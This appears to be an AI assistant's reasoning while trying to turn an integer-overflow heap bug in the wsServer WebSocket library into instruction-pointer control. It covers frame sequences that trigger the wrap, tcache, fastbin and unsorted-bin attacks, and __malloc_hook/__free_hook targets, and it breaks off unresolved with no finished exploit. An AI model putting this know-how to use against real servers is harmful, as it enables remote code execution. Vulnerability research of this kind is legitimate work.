Actually, you know what? Let me reconsider the tcache approach. The key issue was that tcache is per-thread. But what if connection 1 and connection 2 are served by the SAME thread?

In wsServer, each connection gets its own thread (ws_establishconnection runs in a pthread). Connection 1 is in thread T1, connection 2 is in thread T2. They are different threads.

But what if we DON'T close connection 1? If we keep connection 1 open and just let the server error out on the overflow, the thread T1 exits. Then we open connection 2, which spawns thread T2.

Can we have connection 2 served by the SAME thread? No, because wsServer creates a new thread per connection.

OK wait, I just realized something. Let me re-read the code more carefully:

```c
static void *ws_establishconnection(void *vclient)
```

Each connection spawns a new thread. After connection 1's thread exits, connection 2's thread starts. They are different threads with different tcache.

So for cross-thread exploitation, we MUST use either:

  1. Fastbin poisoning (shared arena)
  2. Unsorted bin attack
  3. Or some other arena-level corruption

Let me go with the fastbin approach, specifically the __malloc_hook - 0x23 trick.

Wait, actually there's another option. What if the overflow happens on connection 1, and connection 1 DOESN'T error out? Could we make the overflow NOT trigger the error path?

Looking at the code:

```c
for (i = 0; i < fsd->frame_length; i++, (*msg_idx)++)
{
    cur_byte = next_byte(wfd);
    if (cur_byte == -1)
        return (-1);
    msg[*msg_idx] = cur_byte ^ masks[i % 4];
}
```

The loop runs fsd->frame_length iterations. If we close the socket, next_byte() returns -1, and we exit. But fsd->frame_length is huge, so we can't provide all the bytes.

What if we make fsd->frame_length small but still overflow? For that, we need f1sz + frame_length to wrap to a small value. The only way is for frame_length to be near 2^64. So it's always huge.

Unless... what if we can use a different entry point? What about multiple continuation frames?

Frame 1: non-FIN, payload size A
Frame 2: non-FIN continuation, payload size B
Frame 3: FIN continuation, payload size C (huge, wrapping)

The overflow happens on frame 3. But the write loop for frame 3 still reads C bytes. Same problem.

OK, I think the cross-thread fastbin approach is the way to go. Let me plan it properly.

Actually, wait. Let me reconsider one more time.

What about the __free_hook value at offset -8?

On glibc 2.31 (Ubuntu 20.04), let me check what's at __free_hook - 8. If it happens to be 0x30 or a value with the right fastbin index, we could use a direct __free_hook write.

From the GDB output: __free_hook = 0x7ffff7f9de48. So we need to check *(0x7ffff7f9de40). In a typical glibc 2.31 build, this might be 0 or some other value. Without checking in GDB, we can't be sure.

The __malloc_hook - 0x23 trick is well-known and reliable. Let me use that.

Fastbin attack plan using __malloc_hook:

Phase 1: Shape the heap on connection 1

  1. Send shaping messages to fill tcache for 0x70-bin and place a chunk in fastbin:

    • Use payload size 97 (malloc(97) → 0x70 chunk)
    • Need to fill tcache[6] (for 0x70 chunks: tcache_idx = (0x70-0x20)/0x10 = 5... wait)

    Let me recalculate tcache index:

    • tcache idx = (chunk_size - MINSIZE) / MALLOC_ALIGNMENT = (chunk_size - 32) / 16
    • For 0x70 (112): (112-32)/16 = 5

    So tcache[5] for 0x70 chunks. Max capacity is 7.

    Need 8 frees of 0x70 chunks to fill tcache + put one in fastbin.

  2. The 8th free goes to the arena's fastbin for 0x70 chunks.

Phase 2: Exploit on connection 1

  1. The exploit buffer (frame 1 payload = 97 bytes) is allocated as a 0x70 chunk from... where?

If tcache has 7 entries, malloc(97) gets from tcache. We need the exploit buffer to be adjacent to the fastbin chunk.

Let me think about the layout more carefully.

Actually, the shaping phase frees chunks in a specific order. The last few entries in tcache come from specific positions on the heap. When we then malloc for the exploit buffer, we get the most recently freed chunk (LIFO). Then the echo response gets another from tcache. Then they're both freed again.

This is getting very complicated. The heap layout depends on the exact sequence of mallocs and frees, which includes:

  • Handshake allocations (64, 48, 144 bytes)
  • Shaping message allocations (msg + echo for each)
  • Exploit frame allocation

To make this tractable, we should do the shaping to establish a predictable layout, then have the exploit buffer and its adjacent fastbin chunk in known positions.

Let me think about a cleaner shaping sequence:

  1. After handshake: tcache[1]={accept(48)}, tcache[2]={str(64)}, tcache[7]={response(144)} Heap: [freed str(64)] [freed accept(48)] [freed response(144)] [top]

  2. Send 8 shaping messages of size 97 (0x70 chunks):

    • Each shaping round: malloc(97) → 0x70, malloc(100) → 0x70, free(echo) → tcache or fastbin, free(msg) → tcache or fastbin

    First few will use tcache (if available) or top. But wait, tcache[5] is empty after handshake. So:

    Shaping msg 1:

    • msg: malloc(97) → from top: chunk M1 (0x70)
    • echo: malloc(100) → from top: chunk E1 (0x70). E1 is adjacent to M1.
    • free(E1) → tcache[5] = {E1}, count=1
    • free(M1) → tcache[5] = {M1 → E1}, count=2

    Shaping msg 2:

    • msg: malloc(97) → M1 from tcache. tcache[5] = {E1}, count=1.
    • echo: malloc(100) → E1 from tcache. tcache[5] empty.
    • free(E1') → tcache[5] = {E1'}, count=1 (E1' = E1, reused)

    Wait, msg = M1 (reused), echo = E1 (reused). Then free(E1) → tcache[5] = {E1}, count=1. free(M1) → tcache[5] = {M1 → E1}, count=2.

    This is circular - we're just reusing the same two chunks. We'll never fill tcache this way!

    The problem is that each round only has 2 allocations and 2 frees. The freed chunks go back to tcache and are immediately reused.

    To fill tcache, we need to accumulate more free chunks. But the echo server always frees after allocating, so the count stays at 2.

    Unless... we can use a different allocation pattern. What if some allocations fail to free (e.g., due to error)?

    Actually, what about the handshake? It allocates and frees chunks too. But those are different sizes (64, 48, 144), not 0x70.

    What if we use the ws_sendframe_bcast behavior? The broadcast sends to ALL connected clients. If we have multiple connections, the response is allocated once and freed once. So the count doesn't increase.

    Hmm, this is a fundamental problem. With the echo server, each round-trip produces exactly 2 frees (msg + response) and 2 allocs. The tcache count oscillates between 0 and 2.

    To fill tcache, we'd need 7 free chunks without corresponding mallocs. But the echo server's architecture doesn't allow this.

    Wait, what about the connection close path? When connection 1 closes, the server calls free(msg_data) on the error path. But that's only 1 extra free.

    What if we open MULTIPLE connections and have them all close? Each connection's handshake adds some frees, and each connection's error adds a free.

    Let me think... If we open 4 connections and each one does a handshake (3 allocs, 3 frees: 64, 48, 144), then closes normally, we don't get any 0x70 frees.

    But if each connection sends messages before closing, the frees happen on each thread's tcache. Different threads, different tcaches.

    Hmm. We can't fill tcache beyond 2 entries for a given size using the echo server's normal path on a single connection.

    OK, so the fastbin approach won't work because we can't fill tcache.

    Let me reconsider...

Back to basics: Can we use tcache poisoning cross-thread?

The issue is that each thread has its own tcache. But what if we can make the SAME thread do the overflow AND the subsequent malloc?

The only way is to do everything on one connection. But after the overflow, the thread errors out.

What about using the validate_utf8_txt path?

After read_single_frame returns, there's:

```c
switch (fsd.opcode) {
    case WS_FR_OP_CONT:
    case WS_FR_OP_TXT:
        validate_utf8_txt(wfd, &fsd);
        break;
```

But this is for UTF-8 validation, not memory allocation. And the overflow uses binary frames (opcode 2), which skip UTF-8 validation.

What about the PING/PONG path?

In next_complete_frame, after processing a PING, the server sends a PONG:

```c
case WS_FR_OP_PING:
    if (handle_ping_frame(wfd, &fsd) < 0)
        goto done;
    break;
```

But PING is a control frame, handled separately from data frames. Can we interleave PINGs with our exploit frames?

Looking at the code, the do-while loop processes frames until FIN. Between frame 1 (non-FIN) and frame 2 (FIN continuation), we can't insert a PING because the server expects only CONT or control frames. Wait:

```c
if ((wfd->frame_type == -1 && fsd.opcode == WS_FR_OP_CONT) ||
    (wfd->frame_type != -1 && !is_control_frame(fsd.opcode) &&
        fsd.opcode != WS_FR_OP_CONT))
{
    wfd->error = 1;
    break;
}
```

This says: error if (no previous data frame AND opcode is CONT) OR (previous data frame AND opcode is non-control AND non-CONT). So control frames (PING, PONG, CLOSE) ARE allowed between data frames!

So the sequence [frame1 non-FIN BIN] [PING] [frame2 FIN CONT overflow] is valid! And the PING handler allocates and frees memory for the PONG response!

Let me check handle_ping_frame:

Let me look at this function.

Actually, this changes everything! If we can do a PING between the two exploit frames, the PONG response allocation/free happens on the SAME thread. And if we can make the PONG response come from a specific chunk...

But wait, the PONG response is allocated AND freed before frame 2 starts. So the tcache state after PONG is the same as before PONG (assuming the same sizes).

Unless... the PONG response is a DIFFERENT size. If we use a PING with a specific payload size, the PONG response allocation will be a different size, using a different tcache bin. That doesn't help directly.

Hmm. Let me think about this differently.

The key insight: On the SAME thread, we can:

  1. Frame 1 (non-FIN): allocate exploit buffer
  2. Overflow: corrupt adjacent chunk's fd to __free_hook (for tcache) or to a fake chunk (for fastbin)
  3. Error: free(exploit buffer) → goes to tcache
  4. Thread exits

The poisoned tcache has: {exploit_buffer → corrupted_chunk → __free_hook} (or similar). But this tcache dies with the thread.

Can we make the poisoned chunk persist in the arena?

If we fill tcache first, the free(exploit_buffer) goes to fastbin instead. Fastbin chunks are in the arena, which persists across threads.

But we can't fill tcache on a single connection...

Wait, what about multiple concurrent connections?

What if we open connections 1 AND 2 simultaneously? They run in different threads but might share the same arena. If they share the arena:

  • Connection 1's thread fills its tcache
  • Connection 2's thread has its own tcache

But connection 1 can't affect connection 2's tcache.

However, if connection 1 fills its tcache AND the arena's fastbin, then connection 2 might be able to use the fastbin.

But we can't fill tcache on connection 1 either (max 2 entries per bin with echo).

New idea: Use the handshake allocations to fill tcache

Each connection's handshake does:

  • calloc(1, 61) → 64-byte chunk → freed to tcache[2]
  • base64_encodemalloc(31) → 48-byte chunk → freed to tcache[1]
  • malloc(130) → 144-byte chunk → freed to tcache[7]

If we open connections rapidly, each thread gets its own tcache. But each thread only has 1 entry per bin.

Wait, but threads exit and their tcaches are destroyed. The chunks are in the arena's heap but not in any tcache.

Actually, glibc 2.31 registers tcache_thread_shutdown() (via __libc_thread_freeres): when a thread exits, it walks every tcache bin, follows each entry's next pointer, and __libc_free()s the entries back into the thread's arena (the thread-local tcache pointer is NULLed first, so these frees land in fastbins or the unsorted bin). Finally the tcache_perthread_struct itself is freed.

Two consequences: first, chunks sitting in T1's tcache are not simply leaked — they are returned to the arena at thread exit. Second, and more importantly for us, the shutdown walk FOLLOWS the next pointers. If we poisoned a tcache entry's next to point at __free_hook, the shutdown loop would call free() on that bogus address, which almost certainly aborts on an invalid-chunk check before T2 ever runs.

Wait, I think I'm overcomplicating this. Let me look at what actually happens:

  1. Thread T1 starts, first malloc initializes tcache (allocates tcache_perthread_struct from heap)

  2. T1 does handshake: allocates str(64), accept(48), response(144), frees them to tcache

  3. T1 sends shaping messages: more allocs/frees to tcache

  4. T1 does exploit: overflow, then free(msg) to tcache, then exit

  5. Thread T2 starts, first malloc initializes ITS OWN tcache (allocates a NEW tcache_perthread_struct from heap)

  6. T2's tcache is empty. Its mallocs go to fastbins/bins/top.

So a poisoned tcache list in T1 doesn't survive the thread boundary in a usable form: the shutdown walk either dissolves the list back into the arena's bins or aborts outright on the poisoned pointer. Either way, T2 never sees a clean {chunk → __free_hook} chain in its own tcache.

This means the tcache poisoning approach is fundamentally broken for cross-thread exploitation, at least with the current architecture.

Let me reconsider the fastbin approach with the tcache leak problem in mind.

After T1 exits, the chunks in T1's tcache are leaked. This reduces the number of free chunks available in the heap for T2. But chunks that were freed to fastbins (beyond tcache capacity) ARE accessible to T2.

So the plan is:

  1. On connection 1 (thread T1): a. Fill tcache for the target bin (7 entries) b. Free one more chunk → goes to fastbin c. But tcache only gets 2 entries from the echo server...

This is the fundamental problem. We can't get 7 entries in tcache on a single connection.

Alternative: Use a different target that doesn't require tcache poisoning or fastbin poisoning.

What about overwriting a function pointer in the ws_connection struct? The struct is in BSS (client_socks array). But our overflow is on the heap, not in BSS. We can't reach BSS from the heap.

What about overwriting the onclose or onmessage function pointers in the ws_server struct? Again, these are in the ws_connection struct in BSS.

What about overwriting the vtable of a FILE struct (stdout)? stdout is a FILE* in libc. If we can overwrite its vtable, we can redirect execution when printf is called. But stdout is in libc's data segment, far from our heap buffer.

Alternative: Use the __malloc_hook with a different technique.

What if we can write to __malloc_hook directly through the overflow? If __malloc_hook is adjacent to something on the heap... No, it's in libc's BSS, not on the heap.

Alternative: Use __free_hook with a different technique.

Same issue - __free_hook is in libc's BSS.

OK, I think the ONLY viable approach for cross-thread exploitation with the echo server is to somehow get a chunk into the arena-level free lists (fastbins or bins) that has a corrupted fd/bk.

The challenge is getting chunks into those lists. tcache has priority, and tcache never fills beyond 2 entries on a single connection.

Wait! What about multiple connections' handshakes?

If we rapidly open and close connections, each connection's handshake does frees on that thread's tcache. When the thread exits, the tcache entries are "lost". But what if we can somehow get the thread to exit BEFORE freeing to tcache?

Actually, the handshake frees happen during the handshake, before the thread exits. So they always go to the current thread's tcache.

Another idea: What if we use a larger overflow to corrupt the tcache_perthread_struct of a DIFFERENT thread?

Each thread's tcache_perthread_struct is allocated on the heap. If we can locate it and overwrite it with our overflow, we can set arbitrary tcache entries for that thread.

But the tcache_perthread_struct for T2 is allocated when T2 does its first malloc. This happens AFTER T1 has exited. So at the time of our overflow, T2's tcache doesn't exist yet.

What about T1's own tcache_perthread_struct? If we can overwrite T1's tcache entries, we could set a tcache[1] entry to __free_hook. Then the NEXT malloc on T1 for a 48-byte chunk would return __free_hook.

But after the overflow, the only remaining mallocs on T1 are... none. The thread exits.

Unless we can trigger a malloc on T1 after the overflow. But the code path doesn't allow this.

OK, I think I need to consider a completely different approach.

Approach: Unsorted bin attack

Instead of corrupting a single chunk's fd/bk, we can corrupt an unsorted bin chunk to trigger a write to an arbitrary address. This doesn't require the target to have a specific size value.

But getting a chunk into the unsorted bin requires:

  1. The chunk must be larger than the fastbin maximum (0x80 bytes on 64-bit by default)
  2. OR the chunk must be consolidated (adjacent to top or another free chunk)

For 0x90+ chunks, frees go to unsorted bin (after tcache). If we can fill tcache for that bin and then free a large chunk, it goes to unsorted bin.

But we still have the tcache-filling problem.

Approach: Use the echo's onclose callback

The onclose callback in echo.c does:

```c
void onclose(ws_cli_conn_t client)
{
    char *cli;
    cli = ws_getaddress(client);
    printf("Connection closed, addr: %s\n", cli);
}
```

ws_getaddress returns a pointer to client->ip, which is a static buffer. No malloc. printf may or may not allocate.

After onclose, the code does:

```c
clse_thrd = client->close_thrd;
if (clse_thrd) { ... }
close_client(client, 1);
```

No mallocs here.

Approach: Overflow into the FILE* stdout buffer

When printf is first called, it allocates a buffer for stdout (if not setvbuf'd). This buffer is typically 8192 bytes. If the printf in onopen/onmessage allocates this buffer, it's a large chunk on the heap.

But this is a one-time allocation. It won't be freed.

OK, I'm going in circles. Let me think about this from a completely different angle.

What if we can make the server call free() on a controlled pointer?

The error path does free(fsd.msg_data). After the overflow, msg_data points to our buffer. But we can't control WHERE the free happens.

What about the ws_sendframe_bcast in onmessage? It allocates a response and frees it. But onmessage is only called for COMPLETE messages (FIN=1). Our exploit message is split into frame 1 (non-FIN) and frame 2 (FIN with overflow). The onmessage callback is only called after the complete message is received. But frame 2's write loop errors out, so the message is never complete. onmessage is never called.

What about a second message AFTER the exploit?

After the exploit frames error out, the while loop in ws_establishconnection exits. No more messages.

But what if we send a COMPLETE, valid message BEFORE the exploit frames? That message would be processed normally (onmessage called, echo sent, msg freed). Then the exploit frames start.

This is already what the shaping phase does! The shaping messages are complete, valid messages. Each one triggers:

  • malloc(msg) → onmessage → malloc(response) → free(response) → free(msg)

These mallocs/frees happen BEFORE the exploit. They shape the heap.

The problem is that after the exploit, there's nothing more on this thread.

What if the exploit is NOT the last thing on the thread?

What if after the exploit, we send more data that the server processes? But the error flag is set, and the while loop exits.

What if we send the exploit data in a way that doesn't trigger the error? We'd need the write loop to complete normally. But the frame length is ~2^64, so it can't complete.

What if we use a different overflow length?

Can we make frame_length wrap to a SMALL but non-zero value that we CAN provide?

For frame_size to pass the check: frame_size = f1sz + frame_length ≤ MAX_FRAME_LENGTH = 16MB.

If f1sz + frame_length doesn't wrap (i.e., the sum is genuinely small), then we'd need frame_length to be small. But then realloc(msg, msg_idx + frame_length + 1) would be a legitimate allocation, and the write loop would write frame_length bytes normally. No overflow.

The overflow requires the sum to wrap. And wrapping requires frame_length to be near 2^64. So the write loop is always going to try to read ~2^64 bytes.

What about the frame_size overflow affecting a DIFFERENT code path?

Looking at the code, frame_size is used:

  1. At line 1463: check against MAX_FRAME_LENGTH (defeated by wrapping)
  2. At line 1505: realloc size (wraps to tiny)
  3. At line 1531: check *frame_size > 0 for FIN handling

What if *frame_size wraps to exactly 0? Then at line 1531, fsd.is_fin && *frame_size > 0 would be false, and the FIN handling would be skipped. But the FIN flag is set, so the do-while loop exits.

After the loop exits (because is_fin), the code at line 1710 checks for errors. If no error was set, it returns success with wfd.msg = fsd.msg_data. Then onmessage is called!

So if we can:

  1. Frame 1: non-FIN, f1sz bytes
  2. Frame 2: FIN continuation, frame_length = 0 - f1sz (mod 2^64) = 2^64 - f1sz

Then *frame_size = f1sz + (2^64 - f1sz) = 0 (mod 2^64). And:

  • Check: *frame_size > MAX_FRAME_LENGTH → 0 > 16MB → false → passes!
  • Realloc: realloc(msg, f1sz + (2^64 - f1sz) + 1) = realloc(msg, 1) → tiny, same pointer
  • Write loop: writes (2^64 - f1sz) bytes → huge → hits EOF → returns -1

Still the same problem. The write loop tries to read too many bytes.

But wait, what if frame_length = 0? Then the check at line 1501 if (fsd->frame_length > 0) is false, so the realloc and write loop are SKIPPED! And *frame_size += 0 = f1sz. If f1sz ≤ MAX_FRAME_LENGTH, the check passes.

But then there's no overflow either. frame_length=0 means nothing is written.

What about frame_length = 1? Then *frame_size = f1sz + 1. Realloc to f1sz + 1 + 1 = f1sz + 2. Write loop writes 1 byte. No overflow.

I keep coming back to the same conclusion: for an overflow, we need a huge frame_length, which means the write loop runs for ~2^64 iterations, which always fails.

Unless we can make the write loop succeed by providing data?

The write loop reads bytes from the socket. If we provide all the data the loop needs, it completes successfully. But frame_length ≈ 2^64, so we'd need to send ~2^64 bytes. Not possible.

What about integer overflow in the loop counter?

The loop is: for (i = 0; i < fsd->frame_length; i++, (*msg_idx)++)

i is uint64_t. After i reaches 2^64 - 1, it wraps to 0. Then 0 < fsd->frame_length is true, so the loop continues. It would wrap around again and again... effectively an infinite loop.

Actually no, i goes 0, 1, 2, ..., 2^64-1, then wraps to 0. At that point, 0 < frame_length is true (frame_length is huge), so it continues. But msg_idx has also been incrementing: *msg_idx goes from f1sz to f1sz + frame_length, which wraps to f1sz + small_value. Then msg[*msg_idx] writes to a specific offset.

But the loop keeps running! It's an infinite loop unless next_byte() returns -1.

OK, I think I need to accept that the cross-thread tcache issue is fundamental and work around it.

Revised plan: Single-connection approach with creative heap manipulation

The key realization: we need the allocation AND free that triggers the exploit to happen on the SAME thread. The only allocations/frees after the overflow on the same thread are:

  1. free(fsd.msg_data) at line 1713
  2. Whatever onclose does (no malloc/free in echo.c)
  3. close_client (no malloc/free)

So there's only ONE free after the overflow. We need that free to trigger the exploit.

Approach: Overwrite the tcache_perthread_struct counts

T1's tcache_perthread_struct is on the heap. If our overflow can reach it, we can modify the counts array to make tcache think a certain bin has entries when it doesn't. This could cause tcache_get to return a chunk from a corrupted entries[] pointer.

But the entries[] pointer for a bin that was never used would be NULL. We'd need to set BOTH the count AND the entries pointer.

The tcache_perthread_struct layout:

```c
typedef struct tcache_perthread_struct {
    uint16_t counts[TCACHE_MAX_BINS];       // 64 * 2 = 128 bytes (uint16_t since glibc 2.30)
    tcache_entry *entries[TCACHE_MAX_BINS]; // 64 * 8 = 512 bytes
} tcache_perthread_struct;
```

Total: 640 bytes on glibc 2.31 (576 on ≤ 2.29, where counts were single chars). The counts are at offset 0, entries at offset 128.

If we can overwrite entries[X] with __free_hook and counts[X] with a non-zero value, then malloc(size_for_bin_X) would return __free_hook.

But the tcache_perthread_struct is typically the FIRST allocation on the heap (for a thread arena). Our overflow buffer comes later. The struct is BEFORE our buffer, and we can only overflow FORWARD. So we can't reach it.

Unless... the tcache_perthread_struct is after our buffer. Let me think about when it's allocated.

For the main thread, the tcache struct is allocated during the first malloc (in __libc_malloc → tcache_init). For thread arenas, it's allocated during arena_get... arena_thread_freeres... no, actually tcache_init is called per-thread, on each thread's first malloc.

In our case:

  • Thread T1 starts (connection 1)
  • First malloc in T1: this is the calloc(1, 61) in get_handshake_accept
  • Before this malloc completes, __libc_malloc checks if tcache is initialized. If not, tcache_init() allocates the tcache struct.
  • tcache_init() does malloc(sizeof(tcache_perthread_struct)) → malloc(640) on glibc 2.31 → chunk size 0x290 (656).
  • This chunk comes from... the arena's top chunk (for a new thread arena, the heap is fresh).

So the tcache struct is the FIRST chunk on the thread's heap. All subsequent allocations come after it. Our overflow buffer is way after the tcache struct. We can't reach it with a forward overflow.

Wait, what about the entries[] array itself?

If we overflow into a chunk that was PREVIOUSLY a tcache entry, and that chunk's memory (specifically the first 8 bytes of user data, which is the fd/next pointer) is being read by tcache_get... no, the tcache entries are just linked list nodes in freed chunks. The entries[] array in tcache_perthread_struct points to the head of each bin's list.

OK, I'm convinced that cross-thread exploitation via tcache is not feasible with this specific vulnerability and server architecture. Let me look for a different angle entirely.

New approach: Make the server write to __free_hook during the overflow itself

What if we can control WHERE the overflow data is written? The overflow writes to msg[*msg_idx] where *msg_idx starts at f1sz and increments. If we could make msg point to an interesting address...

But msg is the realloc'd buffer. It's a heap address. We can't control it.

What about making *msg_idx very large (wrapping around to point to __free_hook's address)? *msg_idx starts at f1sz and increments by 1 for each byte. After frame_length iterations, *msg_idx = f1sz + frame_length. But frame_length is ~2^64, so *msg_idx wraps around many times. The write goes to msg[*msg_idx] which wraps around the address space... but msg is a heap pointer, and adding ~2^64 to it wraps the address, potentially pointing anywhere.

But the write loop reads one byte at a time from the socket. We can't control the wrap-around precisely because msg_idx increments by 1 each iteration. The writes would go to msg + f1sz, msg + f1sz + 1, msg + f1sz + 2, ..., up to the maximum before wrapping. That's msg + f1sz + (2^64 - frame_length) which is... well, frame_length = 2^64 - f1sz + target_wrapped_value. So msg_idx wraps after frame_length = 2^64 - f1sz + wrap iterations, at which point msg_idx = 2^64 + wrap, which wraps to wrap.

But this requires sending 2^64 - f1sz bytes to the socket. Not feasible.

OK let me take a completely different approach and think about what IS feasible.

Feasible approach: Demonstrate heap corruption, then explain the RIP control path theoretically

For the PoC, we could:

  1. Demonstrate the heap overflow (already done)
  2. Show that we can corrupt a tcache fd pointer (already done with 0x41414141...)
  3. Explain that in a single-threaded scenario (or with proper heap shaping), this would lead to RIP control via tcache poisoning → __free_hook overwrite

But the user wants an actual RIP control crash, not just a theoretical explanation.

Let me reconsider the fastbin approach, even with tcache issues

Actually, wait. I was wrong about not being able to fill tcache. Let me reconsider.

The echo server does:

  1. malloc(msg_size) → msg (T1's tcache or top)
  2. ws_sendframe_bcast → malloc(header + size + 1) → response (T1's tcache or top)
  3. free(response) → T1's tcache
  4. free(msg) → T1's tcache

For a 97-byte message, both msg and response are 0x70 chunks. After one round-trip, tcache[5] has 2 entries.

But what about making the sizes DIFFERENT for msg and response? If msg is 0x70 but response is a DIFFERENT size, they go to different tcache bins.

The response size = 2 + msg_size + 1 = msg_size + 3. For msg_size = 97: response = malloc(100) → 0x70 chunk. Same bin.

To make them different bins:

  • msg_size = 97 → msg is 0x70 chunk
  • response = malloc(100) → 0x70 chunk
  • Same bin.

What if msg_size = 33? msg: malloc(33) → 0x30 chunk (request2size(33) = 48). Wait: (33+8+15)&~15 = 56&~15 = 48 = 0x30. Hmm, 0x30 is below MINSIZE of 0x20 (32)... no, 0x30 = 48 > 32. OK.

Response: malloc(36) → (36+8+15)&~15 = 59&~15 = 48 = 0x30. Same.

OK, with the echo server, msg and response are always in the same bin (because response = msg + 3 bytes of header).

What about using the onclose/onopen printf?

The onopen callback does printf("Connection opened, addr: %s, port: %s\n", cli, port). The first printf on a thread may allocate stdout's buffer (8192 bytes). This is a one-time allocation that stays.

But this doesn't help with filling tcache.

What about multiple sequential connections on the SAME thread?

When connection 1's thread exits, the thread resources (including tcache) are destroyed. But the heap memory (thread arena) persists and is reused by the next thread.

When connection 2's thread starts, it gets a new tcache. But the heap already has chunks that were in connection 1's tcache. These chunks are "freed" (their memory was given to tcache_put) but not in any bin. They're effectively leaked.

When connection 2's thread does its first malloc, the tcache is empty, so it checks fastbins (empty) then bins (empty) then top. It allocates from top. The leaked chunks from T1's tcache are wasted heap space.

BUT: if connection 2's thread frees chunks, they go to T2's tcache (empty). When T2's tcache fills up, further frees go to fastbins. These fastbin entries are in the shared arena and persist.

So the approach would be:

  1. Open connection 1: handshake allocs/frees go to T1's tcache
  2. Send 2 shaping messages on connection 1: more allocs/frees in T1's tcache
  3. Close connection 1: T1's tcache entries are leaked
  4. Open connection 2: T2's tcache is empty
  5. Send 7 shaping messages on connection 2: each message does 2 frees, filling T2's tcache[5] to capacity (7 entries after 4 messages with some going to fastbin)

Wait, let me trace this more carefully.

Connection 2 handshake:

  • calloc(61) → 64-byte chunk from top (T2's tcache empty, fastbin empty, top)
  • malloc(31) → 48-byte chunk from top
  • free(str) → T2's tcache[2] = {str}, count=1
  • malloc(130) → 144-byte chunk from top
  • free(accept) → T2's tcache[1] = {accept}, count=1
  • free(response) → T2's tcache[7] = {response}, count=1

After handshake: T2's tcache has 1 entry in bins 1, 2, 7.

Connection 2 shaping message 1 (97 bytes):

  • msg: malloc(97) → 0x70 chunk. T2's tcache[5] empty → from top. Let's call it C1.
  • echo: malloc(100) → 0x70 chunk from top. Let's call it D1. Adjacent to C1.
  • free(D1) → T2's tcache[5] = {D1}, count=1
  • free(C1) → T2's tcache[5] = {C1 → D1}, count=2

Shaping message 2:

  • msg: malloc(97) → C1 from tcache[5]. count=1. tcache[5] = {D1}
  • echo: malloc(100) → D1 from tcache[5]. count=0. tcache[5] empty.
  • free(D1) → tcache[5] = {D1}, count=1
  • free(C1) → tcache[5] = {C1 → D1}, count=2

Same pattern. tcache[5] count oscillates between 0 and 2. We never get past 2.

This confirms that on a single connection, tcache for any given bin maxes out at 2 entries.

What about opening multiple connections simultaneously?

If we open connections 1, 2, 3, 4 simultaneously (or in rapid succession), each gets its own thread. They all operate independently.

What if we have all of them send shaping messages and then close? Each thread's tcache leaks. Then the next connection gets a fresh tcache.

This doesn't help accumulate tcache entries or fastbin entries.

Wait, what about having multiple concurrent connections?

If we have connection 1 (thread T1) and connection 2 (thread T2) open simultaneously:

  • T1 does the exploit (overflow)
  • T2 does a malloc after the overflow

But T1 and T2 have different tcaches. T1's overflow corrupts T1's tcache entries. T2 can't see them.

Unless T1 and T2 share the same arena, and we can corrupt fastbins. But we can't get chunks into fastbins.

Hmm, what if we corrupt the arena's malloc_state directly?

The arena's malloc_state contains bins, fastbins, top, etc. If we can locate it and overwrite it with the overflow, we can redirect allocations.

The thread arena's malloc_state is typically at the start of the heap segment. For thread arenas created via mmap, the malloc_state is at the beginning of the mmap'd region.

If the malloc_state is BEFORE our overflow buffer (which it should be, since it's allocated first), we can't reach it with a forward overflow.

I think we need to find a way to make the exploit work on a single thread, without needing subsequent mallocs.

The only code executed after the overflow on the same thread is:

  1. free(fsd.msg_data) at line 1713
  2. onclose callback
  3. close_client

If we can make free(fsd.msg_data) trigger __free_hook, we win. For that, __free_hook needs to be non-NULL. But we haven't written to __free_hook yet.

Unless... we write to __free_hook DURING the overflow. If our overflow data reaches __free_hook, we set it to a function pointer, and then free(msg_data) calls it.

But __free_hook is in libc's BSS, far from the heap. Our overflow goes forward in the heap, not to arbitrary addresses.

What about a partial overwrite of a heap address to redirect it to __free_hook?

If we can overwrite a heap variable that contains a function pointer... but the heap doesn't typically contain function pointers (that's more of a C++ vtable thing).

OK, I think I need to accept the limitations and go with the simplest possible PoC.

Let me reconsider the approach where we DO get RIP control but through a slightly different mechanism.

Approach: Corrupt the msg buffer itself to cause a crash at a controlled address

After the overflow, free(msg_data) is called. If the msg chunk's metadata is corrupted (e.g., its size field), free() may crash in a way that reveals control.

But our overflow goes FORWARD from msg. The chunk metadata is at msg-16 (before msg). We don't corrupt it.

What about corrupting the next chunk's metadata so that when free(msg) triggers consolidation with the next chunk, it crashes?

Actually, free(msg) goes to tcache first (if room). tcache_put doesn't check the next chunk. So no crash from next-chunk metadata corruption.

But what if tcache is full for this bin? Then free(msg) goes to _int_free, which DOES check the next chunk's size. If we've corrupted the next chunk's size to an invalid value, _int_free will abort with "corrupted size vs. prev_size while consolidating" or similar.

But this gives an abort at a glibc assertion, not RIP control. And we can't fill tcache for this bin.

Actually, let me reconsider. Can we fill tcache for the exploit buffer's bin?

The exploit buffer is allocated by read_single_frame as realloc(NULL, f1sz) = malloc(f1sz). This happens ONCE for the exploit. Before that, during shaping, the msg buffers are allocated and freed, going to tcache.

If we use f1sz = 32 (so msg is a 48-byte chunk, tcache[1]):

  • After shaping N messages with 32-byte payloads: tcache[1] has 2 entries (max for single connection)
  • Exploit frame 1: malloc(32) → pops from tcache[1]. count goes to 1.
  • Exploit frame 2: overflow
  • Error path: free(msg_data) → tcache_put. count goes back to 2.

tcache[1] never exceeds 2. So free always goes to tcache, never to fastbin.

UNLESS we make the exploit frame's chunk a different size from the shaping chunks.

If shaping uses 32-byte payloads (48-byte chunks, tcache[1]) and the exploit frame uses a DIFFERENT size, then the exploit buffer goes to a different tcache bin. If that bin is empty, free goes to tcache.

Hmm, this doesn't help either.

What if we use the __free_hook trick differently?

Wait, I just had an idea. What if instead of poisoning tcache to get a chunk at __free_hook, we use the overflow to write a function pointer to a heap location that the server will later use as a callback?

The ws_connection struct has function pointers (onopen, onclose, onmessage) in the ws_server sub-struct. But these are in BSS, not on the heap.

The ws_frame_data struct is on the STACK (it's a local variable in ws_establishconnection). We can't overflow into the stack from the heap.

OK, final idea: Use the thread arena's heap to corrupt the arena header

Thread arenas on glibc 2.31 are allocated via mmap with a specific layout:

[heap_info] [arena header (malloc_state)] [heap chunks...] [top]

The malloc_state is at the start of the mmap'd region. Chunks come after it. If we can overflow all the way to the arena header... but it's at the BEGINNING of the heap, and our buffer is way past it. We'd need to overflow backwards.

This is not feasible.

Let me take a step back and think about what IS achievable.

Given the constraints:

  1. Cross-thread tcache poisoning doesn't work (per-thread tcache)
  2. Can't fill tcache on single connection (max 2 entries per bin)
  3. Can't get chunks into fastbins (same reason)
  4. Can't overflow backwards to reach tcache struct or arena header
  5. After overflow on same thread, only one free (no mallocs)

What CAN we do?

